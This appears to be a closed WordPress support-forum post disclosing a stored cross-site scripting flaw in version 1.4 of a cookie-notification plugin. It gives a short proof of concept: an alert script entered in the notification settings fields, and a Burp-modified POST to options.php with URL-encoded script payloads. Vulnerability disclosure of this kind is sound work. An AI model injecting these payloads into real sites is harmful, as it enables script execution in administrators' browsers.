Stored Cross-Site Scripting in Version 1.4

  • Input fields:

    Notification text
    Read more text
    Read more URL
    Button text
    and more

    Is vulnerable to stored cross-site scripting

    PoC:

    Input <script>alert(666);</script>
    In Notification text input field
    And the javascript will be executed, and stored after Saving.

    Or

    Intercept and modify the request body in Burp of the /wp-admin/options.php request with the body option_page=cpwp_database_settings POST request, with values:
    cpwp_database_message=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
    cpwp_database_readMoreText=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
    cpwp_database_readMoreLink=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
    cpwp_database_buttonText=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E

    And send.

    The javascript will be stored, and executed when loading Cookie Notification under settings in the admin panel.

  • The topic ‘Stored Cross-Site Scripting in Version 1.4’ is closed to new replies.

Tags